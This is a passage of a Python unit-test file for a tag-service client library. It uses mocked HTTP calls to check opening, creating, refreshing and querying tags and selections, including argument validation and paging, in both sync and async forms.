assert [t.path for t in tags[1:]] == sorted(selection.values.keys())
assert selection.values[tags[1].path].data_type == tbase.DataType.BOOLEAN
assert selection.values[tags[2].path].data_type == tbase.DataType.DATE_TIME
def test__open_selection__creates_selection_and_queries_tags(self):
path1 = "tag1"
path2 = "tag2"
paths = [path1, path2]
token = uuid.uuid4()
def mock_request(method, uri, params=None, data=None):
if (method, uri) == ("POST", "/nitag/v2/selections"):
ret = dict(data) if data else {}
ret["id"] = token
return ret, MockResponse(method, uri)
elif (method, uri) == ("GET", "/nitag/v2/selections/{id}/tags"):
return (
[
{"type": "BOOLEAN", "path": path1},
{"type": "DOUBLE", "path": path2},
],
MockResponse(method, uri),
)
elif (method, uri) == ("DELETE", "/nitag/v2/selections/{id}"):
return None, MockResponse(method, uri)
else:
assert False, (method, uri)
self._client.all_requests.configure_mock(side_effect=mock_request)
selection = self._uut.open_selection(paths)
assert self._client.all_requests.call_args_list == [
mock.call(
"POST",
"/nitag/v2/selections",
params=None,
data={"searchPaths": AnyOrderList(paths)},
),
mock.call("GET", "/nitag/v2/selections/{id}/tags", params={"id": token}),
]
assert 2 == len(selection.metadata)
@pytest.mark.asyncio
async def test__open_selection_async__creates_selection_and_queries_tags(self):
path1 = "tag1"
path2 = "tag2"
paths = [path1, path2]
token = uuid.uuid4()
def mock_request(method, uri, params=None, data=None):
if (method, uri) == ("POST", "/nitag/v2/selections"):
ret = dict(data) if data else {}
ret["id"] = token
return ret, MockResponse(method, uri)
elif (method, uri) == ("GET", "/nitag/v2/selections/{id}/tags"):
return (
[
{"type": "BOOLEAN", "path": path1},
{"type": "DOUBLE", "path": path2},
],
MockResponse(method, uri),
)
elif (method, uri) == ("DELETE", "/nitag/v2/selections/{id}"):
return None, MockResponse(method, uri)
else:
assert False, (method, uri)
self._client.all_requests.configure_mock(side_effect=mock_request)
selection = await self._uut.open_selection_async(paths)
assert self._client.all_requests.call_args_list == [
mock.call(
"POST",
"/nitag/v2/selections",
params=None,
data={"searchPaths": AnyOrderList(paths)},
),
mock.call("GET", "/nitag/v2/selections/{id}/tags", params={"id": token}),
]
assert 2 == len(selection.metadata)
def test__bag_arguments__open__raises(self):
with pytest.raises(ValueError):
self._uut.open(None)
with pytest.raises(ValueError):
self._uut.open(None, tbase.DataType.BOOLEAN)
with pytest.raises(ValueError):
self._uut.open(None, tbase.DataType.BOOLEAN, create=True)
with pytest.raises(ValueError):
self._uut.open("")
with pytest.raises(ValueError):
self._uut.open("", tbase.DataType.BOOLEAN)
with pytest.raises(ValueError):
self._uut.open("", tbase.DataType.BOOLEAN, create=True)
with pytest.raises(ValueError):
self._uut.open(" ")
with pytest.raises(ValueError):
self._uut.open(" ", tbase.DataType.BOOLEAN)
with pytest.raises(ValueError):
self._uut.open(" ", tbase.DataType.BOOLEAN, create=True)
with pytest.raises(ValueError):
self._uut.open("*")
with pytest.raises(ValueError):
self._uut.open("*", tbase.DataType.BOOLEAN)
with pytest.raises(ValueError):
self._uut.open("*", tbase.DataType.BOOLEAN, create=True)
with pytest.raises(ValueError):
self._uut.open("tag", tbase.DataType.UNKNOWN)
with pytest.raises(ValueError):
self._uut.open("tag", tbase.DataType.UNKNOWN, create=True)
def test__existing_tag__open_without_datatype__retrieves_tag(self):
path = "tag1"
public_properties = {"prop1": "value1", "prop2": "value2"}
all_properties = dict(public_properties)
dummy_tag = tbase.TagData(path)
dummy_tag.retention_type = tbase.RetentionType.COUNT
dummy_tag.retention_count = 7
dummy_tag.retention_days = 9
dummy_tag._copy_retention_properties(all_properties)
keywords = ["keyword1", "keyword2"]
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"type": "BOOLEAN",
"properties": all_properties,
"path": path,
"keywords": keywords,
"collectAggregates": True,
}
]
)
)
tag = self._uut.open(path)
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags/{path}", params={"path": path}
)
assert tag is not None
assert tbase.DataType.BOOLEAN == tag.data_type
assert tag.collect_aggregates is True
assert keywords == sorted(tag.keywords)
assert sorted(public_properties.items()) == sorted(tag.properties.items())
assert dummy_tag.retention_count == tag.retention_count
assert dummy_tag.retention_days == tag.retention_days
assert dummy_tag.retention_type == tag.retention_type
def test___tag_not_found__open_without_datatype__raises(self):
err = core.ApiError()
err.name = "Tag.NoSuchTag"
ex = core.ApiException("404 tag not found", err)
self._client.all_requests.configure_mock(side_effect=ex)
with pytest.raises(core.ApiException) as actual:
self._uut.open("tag")
assert ex is actual.value
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags/{path}", params={"path": "tag"}
)
def test___tag_not_found__open_with_datatype__creates_tag(self):
path = "tag"
err = core.ApiError()
err.name = "Tag.NoSuchTag"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[core.ApiException("404 tag not found", err), None]
)
)
tag = self._uut.open(path, tbase.DataType.UINT64)
assert self._client.all_requests.call_args_list == [
mock.call("GET", "/nitag/v2/tags/{path}", params={"path": "tag"}),
mock.call(
"POST",
"/nitag/v2/tags",
params=None,
data={"path": path, "type": "U_INT64"},
),
]
assert path == tag.path
assert tbase.DataType.UINT64 == tag.data_type
assert not tag.collect_aggregates
assert 0 == len(tag.keywords)
assert 0 == len(tag.properties)
assert tag.retention_count is None
assert tag.retention_days is None
assert tbase.RetentionType.NONE == tag.retention_type
def test___tag_not_found__open_with_create_true__creates_tag(self):
path = "tag"
err = core.ApiError()
err.name = "Tag.NoSuchTag"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[core.ApiException("404 tag not found", err), None]
)
)
tag = self._uut.open(path, tbase.DataType.UINT64, create=True)
assert self._client.all_requests.call_args_list == [
mock.call("GET", "/nitag/v2/tags/{path}", params={"path": "tag"}),
mock.call(
"POST",
"/nitag/v2/tags",
params=None,
data={"path": path, "type": "U_INT64"},
),
]
assert path == tag.path
assert tbase.DataType.UINT64 == tag.data_type
assert not tag.collect_aggregates
assert 0 == len(tag.keywords)
assert 0 == len(tag.properties)
assert tag.retention_count is None
assert tag.retention_days is None
assert tbase.RetentionType.NONE == tag.retention_type
def test__tag_exists__open__does_not_create_tag(self):
path = "tag1"
public_properties = {"prop1": "value1", "prop2": "value2"}
all_properties = dict(public_properties)
dummy_tag = tbase.TagData(path)
dummy_tag.retention_type = tbase.RetentionType.COUNT
dummy_tag.retention_count = 7
dummy_tag.retention_days = 9
dummy_tag._copy_retention_properties(all_properties)
keywords = ["keyword1", "keyword2"]
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"type": "BOOLEAN",
"properties": all_properties,
"path": path,
"keywords": keywords,
"collectAggregates": True,
}
]
)
)
tag = self._uut.open(path, tbase.DataType.BOOLEAN, create=True)
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags/{path}", params={"path": "tag1"}
)
assert tag is not None
assert tbase.DataType.BOOLEAN == tag.data_type
assert tag.collect_aggregates is True
assert keywords == sorted(tag.keywords)
assert sorted(public_properties.items()) == sorted(tag.properties.items())
assert dummy_tag.retention_count == tag.retention_count
assert dummy_tag.retention_days == tag.retention_days
assert dummy_tag.retention_type == tag.retention_type
def test__tag_not_found__open_with_create_False__raises(self):
err = core.ApiError()
err.name = "Tag.NoSuchTag"
ex = core.ApiException("404 tag not found", err)
self._client.all_requests.configure_mock(side_effect=ex)
with pytest.raises(core.ApiException) as actual:
self._uut.open("tag", tbase.DataType.DOUBLE, create=False)
assert ex is actual.value
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags/{path}", params={"path": "tag"}
)
def test__tag_exists_with_different_datatype__open__raises(self):
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([{"type": "BOOLEAN", "path": "tag"}] * 3)
)
with pytest.raises(core.ApiException):
self._uut.open("tag", tbase.DataType.DOUBLE)
with pytest.raises(core.ApiException):
self._uut.open("tag", tbase.DataType.DOUBLE, create=False)
with pytest.raises(core.ApiException):
self._uut.open("tag", tbase.DataType.DOUBLE, create=True)
assert self._client.all_requests.call_args_list == [
mock.call("GET", "/nitag/v2/tags/{path}", params={"path": "tag"}),
mock.call("GET", "/nitag/v2/tags/{path}", params={"path": "tag"}),
mock.call("GET", "/nitag/v2/tags/{path}", params={"path": "tag"}),
]
@pytest.mark.asyncio
async def test__bag_arguments__open_async__raises(self):
with pytest.raises(ValueError):
await self._uut.open_async(None)
with pytest.raises(ValueError):
await self._uut.open_async(None, tbase.DataType.BOOLEAN)
with pytest.raises(ValueError):
await self._uut.open_async(None, tbase.DataType.BOOLEAN, create=True)
with pytest.raises(ValueError):
await self._uut.open_async("")
with pytest.raises(ValueError):
await self._uut.open_async("", tbase.DataType.BOOLEAN)
with pytest.raises(ValueError):
await self._uut.open_async("", tbase.DataType.BOOLEAN, create=True)
with pytest.raises(ValueError):
await self._uut.open_async(" ")
with pytest.raises(ValueError):
await self._uut.open_async(" ", tbase.DataType.BOOLEAN)
with pytest.raises(ValueError):
await self._uut.open_async(" ", tbase.DataType.BOOLEAN, create=True)
with pytest.raises(ValueError):
await self._uut.open_async("*")
with pytest.raises(ValueError):
await self._uut.open_async("*", tbase.DataType.BOOLEAN)
with pytest.raises(ValueError):
await self._uut.open_async("*", tbase.DataType.BOOLEAN, create=True)
with pytest.raises(ValueError):
await self._uut.open_async("tag", tbase.DataType.UNKNOWN)
with pytest.raises(ValueError):
await self._uut.open_async("tag", tbase.DataType.UNKNOWN, create=True)
@pytest.mark.asyncio
async def test__existing_tag__open_async_without_datatype__retrieves_tag(self):
path = "tag1"
public_properties = {"prop1": "value1", "prop2": "value2"}
all_properties = dict(public_properties)
dummy_tag = tbase.TagData(path)
dummy_tag.retention_type = tbase.RetentionType.COUNT
dummy_tag.retention_count = 7
dummy_tag.retention_days = 9
dummy_tag._copy_retention_properties(all_properties)
keywords = ["keyword1", "keyword2"]
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"type": "BOOLEAN",
"properties": all_properties,
"path": path,
"keywords": keywords,
"collectAggregates": True,
}
]
)
)
tag = await self._uut.open_async(path)
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags/{path}", params={"path": "tag1"}
)
assert tag is not None
assert tbase.DataType.BOOLEAN == tag.data_type
assert tag.collect_aggregates is True
assert keywords == sorted(tag.keywords)
assert sorted(public_properties.items()) == sorted(tag.properties.items())
assert dummy_tag.retention_count == tag.retention_count
assert dummy_tag.retention_days == tag.retention_days
assert dummy_tag.retention_type == tag.retention_type
@pytest.mark.asyncio
async def test___tag_not_found__open_async_without_datatype__raises(self):
err = core.ApiError()
err.name = "Tag.NoSuchTag"
ex = core.ApiException("404 tag not found", err)
self._client.all_requests.configure_mock(side_effect=ex)
with pytest.raises(core.ApiException) as actual:
await self._uut.open_async("tag")
assert ex is actual.value
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags/{path}", params={"path": "tag"}
)
@pytest.mark.asyncio
async def test___tag_not_found__open_async_with_datatype__creates_tag(self):
path = "tag"
err = core.ApiError()
err.name = "Tag.NoSuchTag"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[core.ApiException("404 tag not found", err), None]
)
)
tag = await self._uut.open_async(path, tbase.DataType.UINT64)
assert self._client.all_requests.call_args_list == [
mock.call("GET", "/nitag/v2/tags/{path}", params={"path": "tag"}),
mock.call(
"POST",
"/nitag/v2/tags",
params=None,
data={"path": path, "type": "U_INT64"},
),
]
assert path == tag.path
assert tbase.DataType.UINT64 == tag.data_type
assert not tag.collect_aggregates
assert 0 == len(tag.keywords)
assert 0 == len(tag.properties)
assert tag.retention_count is None
assert tag.retention_days is None
assert tbase.RetentionType.NONE == tag.retention_type
@pytest.mark.asyncio
async def test___tag_not_found__open_async_with_create_true__creates_tag(self):
path = "tag"
err = core.ApiError()
err.name = "Tag.NoSuchTag"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[core.ApiException("404 tag not found", err), None]
)
)
tag = await self._uut.open_async(path, tbase.DataType.UINT64, create=True)
assert self._client.all_requests.call_args_list == [
mock.call("GET", "/nitag/v2/tags/{path}", params={"path": "tag"}),
mock.call(
"POST",
"/nitag/v2/tags",
params=None,
data={"path": path, "type": "U_INT64"},
),
]
assert path == tag.path
assert tbase.DataType.UINT64 == tag.data_type
assert not tag.collect_aggregates
assert 0 == len(tag.keywords)
assert 0 == len(tag.properties)
assert tag.retention_count is None
assert tag.retention_days is None
assert tbase.RetentionType.NONE == tag.retention_type
@pytest.mark.asyncio
async def test__tag_exists__open_async__does_not_create_tag(self):
path = "tag1"
public_properties = {"prop1": "value1", "prop2": "value2"}
all_properties = dict(public_properties)
dummy_tag = tbase.TagData(path)
dummy_tag.retention_type = tbase.RetentionType.COUNT
dummy_tag.retention_count = 7
dummy_tag.retention_days = 9
dummy_tag._copy_retention_properties(all_properties)
keywords = ["keyword1", "keyword2"]
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"type": "BOOLEAN",
"properties": all_properties,
"path": path,
"keywords": keywords,
"collectAggregates": True,
}
]
)
)
tag = await self._uut.open_async(path, tbase.DataType.BOOLEAN, create=True)
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags/{path}", params={"path": "tag1"}
)
assert tag is not None
assert tbase.DataType.BOOLEAN == tag.data_type
assert tag.collect_aggregates is True
assert keywords == sorted(tag.keywords)
assert sorted(public_properties.items()) == sorted(tag.properties.items())
assert dummy_tag.retention_count == tag.retention_count
assert dummy_tag.retention_days == tag.retention_days
assert dummy_tag.retention_type == tag.retention_type
@pytest.mark.asyncio
async def test__tag_not_found__open_async_with_create_False__raises(self):
err = core.ApiError()
err.name = "Tag.NoSuchTag"
ex = core.ApiException("404 tag not found", err)
self._client.all_requests.configure_mock(side_effect=ex)
with pytest.raises(core.ApiException) as actual:
await self._uut.open_async("tag", tbase.DataType.DOUBLE, create=False)
assert ex is actual.value
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags/{path}", params={"path": "tag"}
)
@pytest.mark.asyncio
async def test__tag_exists_with_different_datatype__open_async__raises(self):
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([{"type": "BOOLEAN", "path": "tag"}] * 3)
)
with pytest.raises(core.ApiException):
await self._uut.open_async("tag", tbase.DataType.DOUBLE)
with pytest.raises(core.ApiException):
await self._uut.open_async("tag", tbase.DataType.DOUBLE, create=False)
with pytest.raises(core.ApiException):
await self._uut.open_async("tag", tbase.DataType.DOUBLE, create=True)
assert self._client.all_requests.call_args_list == [
mock.call("GET", "/nitag/v2/tags/{path}", params={"path": "tag"}),
mock.call("GET", "/nitag/v2/tags/{path}", params={"path": "tag"}),
mock.call("GET", "/nitag/v2/tags/{path}", params={"path": "tag"}),
]
def test__invalid_tags__refresh__raises(self):
with pytest.raises(ValueError):
self._uut.refresh(None)
with pytest.raises(ValueError):
self._uut.refresh([None])
with pytest.raises(ValueError):
self._uut.refresh([tbase.TagData("tag"), None])
with pytest.raises(ValueError):
self._uut.refresh([tbase.TagData("tag"), tbase.TagData(None)])
with pytest.raises(ValueError):
self._uut.refresh([tbase.TagData("tag"), tbase.TagData("")])
def test__multiple_tags_given__refresh__all_tags_updated(self):
path1 = "tag1"
path2 = "tag2"
public_properties = {"prop1": "value1", "prop2": "value2"}
all_properties = dict(public_properties)
dummy_tag = tbase.TagData(path1)
dummy_tag.retention_type = tbase.RetentionType.COUNT
dummy_tag.retention_count = 7
dummy_tag.retention_days = 9
dummy_tag._copy_retention_properties(all_properties)
keywords = ["keyword1", "keyword2"]
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"totalCount": 2,
"tags": [
{
"type": "BOOLEAN",
"properties": all_properties,
"path": path1,
"keywords": keywords,
"collectAggregates": True,
},
{"type": "DOUBLE", "path": path2},
],
}
]
)
)
tag1 = tbase.TagData(path1)
tag2 = tbase.TagData(
path2, tbase.DataType.UINT64, ["dummy"], {"dummy": "dummy"}
)
tag2.set_retention_count(9)
self._uut.refresh([tag1, tag2])
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags", params={"path": path1 + "," + path2, "take": "2"}
)
assert tbase.DataType.BOOLEAN == tag1.data_type
assert tag1.collect_aggregates is True
assert keywords == sorted(tag1.keywords)
assert sorted(public_properties.items()) == sorted(tag1.properties.items())
assert dummy_tag.retention_count == tag1.retention_count
assert dummy_tag.retention_days == tag1.retention_days
assert dummy_tag.retention_type == tag1.retention_type
assert tbase.DataType.DOUBLE == tag2.data_type
assert tag2.collect_aggregates is False
assert 0 == len(tag2.keywords)
assert 0 == len(tag2.properties)
assert tag2.retention_count is None
assert tag2.retention_days is None
assert tbase.RetentionType.NONE == tag2.retention_type
def test__missing_tags_supplied__refresh__missing_tags_ignored(self):
keywords = ["keyword"]
properties = {"prop": "value"}
tag1 = tbase.TagData("existing")
tag2 = tbase.TagData("missing", tbase.DataType.DOUBLE, keywords, properties)
tag2.collect_aggregates = True
tag2.set_retention_days(6)
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[{"totalCount": 1, "tags": [{"type": "BOOLEAN", "path": "existing"}]}]
)
)
self._uut.refresh([tag1, tag2])
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags", params={"path": "existing,missing", "take": "2"}
)
assert tbase.DataType.BOOLEAN == tag1.data_type
assert tbase.DataType.UNKNOWN == tag2.data_type
assert tag2.collect_aggregates is True
assert keywords == tag2.keywords
assert properties == tag2.properties
assert tag2.retention_count is None
assert 6 == tag2.retention_days
assert tbase.RetentionType.DURATION == tag2.retention_type
@pytest.mark.asyncio
async def test__invalid_tags__refresh_async__raises(self):
with pytest.raises(ValueError):
await self._uut.refresh_async(None)
with pytest.raises(ValueError):
await self._uut.refresh_async([None])
with pytest.raises(ValueError):
await self._uut.refresh_async([tbase.TagData("tag"), None])
with pytest.raises(ValueError):
await self._uut.refresh_async([tbase.TagData("tag"), tbase.TagData(None)])
with pytest.raises(ValueError):
await self._uut.refresh_async([tbase.TagData("tag"), tbase.TagData("")])
@pytest.mark.asyncio
async def test__multiple_tags_given__refresh_async__all_tags_updated(self):
path1 = "tag1"
path2 = "tag2"
public_properties = {"prop1": "value1", "prop2": "value2"}
all_properties = dict(public_properties)
dummy_tag = tbase.TagData(path1)
dummy_tag.retention_type = tbase.RetentionType.COUNT
dummy_tag.retention_count = 7
dummy_tag.retention_days = 9
dummy_tag._copy_retention_properties(all_properties)
keywords = ["keyword1", "keyword2"]
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"totalCount": 2,
"tags": [
{
"type": "BOOLEAN",
"properties": all_properties,
"path": path1,
"keywords": keywords,
"collectAggregates": True,
},
{"type": "DOUBLE", "path": path2},
],
}
]
)
)
tag1 = tbase.TagData(path1)
tag2 = tbase.TagData(
path2, tbase.DataType.UINT64, ["dummy"], {"dummy": "dummy"}
)
tag2.set_retention_count(9)
await self._uut.refresh_async([tag1, tag2])
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags", params={"path": path1 + "," + path2, "take": "2"}
)
assert tbase.DataType.BOOLEAN == tag1.data_type
assert tag1.collect_aggregates is True
assert keywords == sorted(tag1.keywords)
assert sorted(public_properties.items()) == sorted(tag1.properties.items())
assert dummy_tag.retention_count == tag1.retention_count
assert dummy_tag.retention_days == tag1.retention_days
assert dummy_tag.retention_type == tag1.retention_type
assert tbase.DataType.DOUBLE == tag2.data_type
assert tag2.collect_aggregates is False
assert 0 == len(tag2.keywords)
assert 0 == len(tag2.properties)
assert tag2.retention_count is None
assert tag2.retention_days is None
assert tbase.RetentionType.NONE == tag2.retention_type
@pytest.mark.asyncio
async def test__missing_tags_supplied__refresh_async__missing_tags_ignored(self):
keywords = ["keyword"]
properties = {"prop": "value"}
tag1 = tbase.TagData("existing")
tag2 = tbase.TagData("missing", tbase.DataType.DOUBLE, keywords, properties)
tag2.collect_aggregates = True
tag2.set_retention_days(6)
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[{"totalCount": 1, "tags": [{"type": "BOOLEAN", "path": "existing"}]}]
)
)
await self._uut.refresh_async([tag1, tag2])
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags", params={"path": "existing,missing", "take": "2"}
)
assert tbase.DataType.BOOLEAN == tag1.data_type
assert tbase.DataType.UNKNOWN == tag2.data_type
assert tag2.collect_aggregates is True
assert keywords == tag2.keywords
assert properties == tag2.properties
assert tag2.retention_count is None
assert 6 == tag2.retention_days
assert tbase.RetentionType.DURATION == tag2.retention_type
def test__bad_arguments__query__raises(self):
with pytest.raises(ValueError):
self._uut.query(skip=-1, take=0)
with pytest.raises(ValueError):
self._uut.query(skip=0, take=-1)
with pytest.raises(ValueError):
self._uut.query([])
with pytest.raises(ValueError):
self._uut.query(["tag", None])
with pytest.raises(ValueError):
self._uut.query(["tag", ""])
with pytest.raises(ValueError):
self._uut.query(["tag", " "])
with pytest.raises(ValueError):
self._uut.query([], skip=0, take=0)
with pytest.raises(ValueError):
self._uut.query(["tag", None], skip=0, take=0)
with pytest.raises(ValueError):
self._uut.query(["tag", ""], skip=0, take=0)
with pytest.raises(ValueError):
self._uut.query(["tag", " "], skip=0, take=0)
with pytest.raises(ValueError):
self._uut.query(["tag"], skip=-1, take=0)
with pytest.raises(ValueError):
self._uut.query(["tag"], skip=0, take=-1)
with pytest.raises(ValueError):
self._uut.query(["tag", None], None, None)
with pytest.raises(ValueError):
self._uut.query(["tag", ""], None, None)
with pytest.raises(ValueError):
self._uut.query(["tag", " "], None, None)
with pytest.raises(ValueError):
self._uut.query(["tag", None], None, None, skip=0, take=0)
with pytest.raises(ValueError):
self._uut.query(["tag", ""], None, None, skip=0, take=0)
with pytest.raises(ValueError):
self._uut.query(["tag", " "], None, None, skip=0, take=0)
with pytest.raises(ValueError):
self._uut.query(["tag"], None, None, skip=-1, take=0)
with pytest.raises(ValueError):
self._uut.query(["tag"], None, None, skip=0, take=-1)
def test__only_skip_and_take_supplied__query__performs_query(self):
total_count = 4
path1 = "tag1"
path2 = "tag2"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"totalCount": total_count,
"tags": [{"type": "BOOLEAN", "path": path1}],
},
{
"totalCount": total_count,
"tags": [{"type": "DATE_TIME", "path": path2}],
},
]
)
)
result = self._uut.query(skip=2, take=1)
assert total_count == result.total_count
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags", params={"skip": "2", "take": "1"}
)
pages = list(result)
assert self._client.all_requests.call_args_list == [
mock.call("GET", "/nitag/v2/tags", params={"skip": "2", "take": "1"}),
mock.call("GET", "/nitag/v2/tags", params={"skip": "3", "take": "1"}),
]
assert 2 == len(pages)
assert 1 == len(pages[0])
assert path1 == pages[0][0].path
assert tbase.DataType.BOOLEAN == pages[0][0].data_type
assert 1 == len(pages[1])
assert path2 == pages[1][0].path
assert tbase.DataType.DATE_TIME == pages[1][0].data_type
def test__only_paths_supplied__query__performs_query(self):
total_count = 0
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([{"totalCount": 0, "tags": []}])
)
result = self._uut.query(["tag1", "tag2"])
assert total_count == result.total_count
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags", params={"path": "tag1,tag2", "skip": "0"}
)
def test__path_with_skip_and_take_supplied__query__performs_query(self):
total_count = 4
path1 = "tag1"
path2 = "tag2"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"totalCount": total_count,
"tags": [{"type": "BOOLEAN", "path": path1}],
},
{
"totalCount": total_count,
"tags": [{"type": "DATE_TIME", "path": path2}],
},
]
)
)
result = self._uut.query(
["missing1", path1, "missing2", path2, "missing3"], skip=2, take=1
)
assert total_count == result.total_count
paths = ",".join(("missing1", path1, "missing2", path2, "missing3"))
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags", params={"path": paths, "skip": "2", "take": "1"}
)
pages = list(result)
assert self._client.all_requests.call_args_list == [
mock.call(
"GET",
"/nitag/v2/tags",
params={"path": paths, "skip": "2", "take": "1"},
),
mock.call(
"GET",
"/nitag/v2/tags",
params={"path": paths, "skip": "3", "take": "1"},
),
]
assert 2 == len(pages)
assert 1 == len(pages[0])
assert path1 == pages[0][0].path
assert tbase.DataType.BOOLEAN == pages[0][0].data_type
assert 1 == len(pages[1])
assert path2 == pages[1][0].path
assert tbase.DataType.DATE_TIME == pages[1][0].data_type
def test__paths_with_keywords_and_properties_supplied__query__performs_query(self):
total_count = 0
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[{"totalCount": total_count, "tags": []}]
)
)
result = self._uut.query(
["tag1", "tag2"],
["keyword1", "keyword2"],
OrderedDict((("prop1", "value1"), ("prop2", "value2"))),
)
assert total_count == result.total_count
self._client.all_requests.assert_called_once_with(
"GET",
"/nitag/v2/tags",
params={
"path": "tag1,tag2",
"keywords": "keyword1,keyword2",
"properties": "prop1=value1,prop2=value2",
"skip": "0",
},
)
def test__only_keywords_and_properties_supplied__query__performs_query(self):
total_count = 0
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[{"totalCount": total_count, "tags": []}]
)
)
result = self._uut.query(
None,
["keyword1", "keyword2"],
OrderedDict((("prop1", "value1"), ("prop2", "value2"))),
)
assert total_count == result.total_count
self._client.all_requests.assert_called_once_with(
"GET",
"/nitag/v2/tags",
params={
"keywords": "keyword1,keyword2",
"properties": "prop1=value1,prop2=value2",
"skip": "0",
},
)
def test__all_inputs_supplied__query__performs_query(self):
total_count = 4
path1 = "tag1"
path2 = "tag2"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"totalCount": total_count,
"tags": [{"type": "BOOLEAN", "path": path1}],
},
{
"totalCount": total_count,
"tags": [{"type": "DATE_TIME", "path": path2}],
},
]
)
)
result = self._uut.query(
["missing1", path1, "missing2", path2, "missing3"],
["keyword1", "keyword2"],
OrderedDict((("prop1", "value1"), ("prop2", "value2"))),
skip=2,
take=1,
)
assert total_count == result.total_count
paths = ",".join(("missing1", path1, "missing2", path2, "missing3"))
self._client.all_requests.assert_called_once_with(
"GET",
"/nitag/v2/tags",
params={
"path": paths,
"keywords": "keyword1,keyword2",
"properties": "prop1=value1,prop2=value2",
"skip": "2",
"take": "1",
},
)
pages = list(result)
assert self._client.all_requests.call_args_list == [
mock.call(
"GET",
"/nitag/v2/tags",
params={
"path": paths,
"keywords": "keyword1,keyword2",
"properties": "prop1=value1,prop2=value2",
"skip": "2",
"take": "1",
},
),
mock.call(
"GET",
"/nitag/v2/tags",
params={
"path": paths,
"keywords": "keyword1,keyword2",
"properties": "prop1=value1,prop2=value2",
"skip": "3",
"take": "1",
},
),
]
assert 2 == len(pages)
assert 1 == len(pages[0])
assert path1 == pages[0][0].path
assert tbase.DataType.BOOLEAN == pages[0][0].data_type
assert 1 == len(pages[1])
assert path2 == pages[1][0].path
assert tbase.DataType.DATE_TIME == pages[1][0].data_type
@pytest.mark.asyncio
async def test__bad_arguments__query_async__raises(self):
with pytest.raises(ValueError):
await self._uut.query_async(skip=-1, take=0)
with pytest.raises(ValueError):
await self._uut.query_async(skip=0, take=-1)
with pytest.raises(ValueError):
await self._uut.query_async([])
with pytest.raises(ValueError):
await self._uut.query_async(["tag", None])
with pytest.raises(ValueError):
await self._uut.query_async(["tag", ""])
with pytest.raises(ValueError):
await self._uut.query_async(["tag", " "])
with pytest.raises(ValueError):
await self._uut.query_async([], skip=0, take=0)
with pytest.raises(ValueError):
await self._uut.query_async(["tag", None], skip=0, take=0)
with pytest.raises(ValueError):
await self._uut.query_async(["tag", ""], skip=0, take=0)
with pytest.raises(ValueError):
await self._uut.query_async(["tag", " "], skip=0, take=0)
with pytest.raises(ValueError):
await self._uut.query_async(["tag"], skip=-1, take=0)
with pytest.raises(ValueError):
await self._uut.query_async(["tag"], skip=0, take=-1)
with pytest.raises(ValueError):
await self._uut.query_async(["tag", None], None, None)
with pytest.raises(ValueError):
await self._uut.query_async(["tag", ""], None, None)
with pytest.raises(ValueError):
await self._uut.query_async(["tag", " "], None, None)
with pytest.raises(ValueError):
await self._uut.query_async(["tag", None], None, None, skip=0, take=0)
with pytest.raises(ValueError):
await self._uut.query_async(["tag", ""], None, None, skip=0, take=0)
with pytest.raises(ValueError):
await self._uut.query_async(["tag", " "], None, None, skip=0, take=0)
with pytest.raises(ValueError):
await self._uut.query_async(["tag"], None, None, skip=-1, take=0)
with pytest.raises(ValueError):
await self._uut.query_async(["tag"], None, None, skip=0, take=-1)
@pytest.mark.asyncio
async def test__only_skip_and_take_supplied__query_async__performs_query(self):
total_count = 4
path1 = "tag1"
path2 = "tag2"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"totalCount": total_count,
"tags": [{"type": "BOOLEAN", "path": path1}],
},
{
"totalCount": total_count,
"tags": [{"type": "DATE_TIME", "path": path2}],
},
]
)
)
result = await self._uut.query_async(skip=2, take=1)
assert total_count == result.total_count
assert result.current_page is not None
assert 1 == len(result.current_page)
assert path1 == result.current_page[0].path
assert tbase.DataType.BOOLEAN == result.current_page[0].data_type
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags", params={"skip": "2", "take": "1"}
)
await result.move_next_page_async()
assert result.current_page is not None
assert 1 == len(result.current_page)
assert path2 == result.current_page[0].path
assert tbase.DataType.DATE_TIME == result.current_page[0].data_type
assert self._client.all_requests.call_args_list == [
mock.call("GET", "/nitag/v2/tags", params={"skip": "2", "take": "1"}),
mock.call("GET", "/nitag/v2/tags", params={"skip": "3", "take": "1"}),
]
await result.move_next_page_async()
assert result.current_page is None
@pytest.mark.asyncio
async def test__only_paths_supplied__query_async__performs_query(self):
total_count = 0
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([{"totalCount": 0, "tags": []}])
)
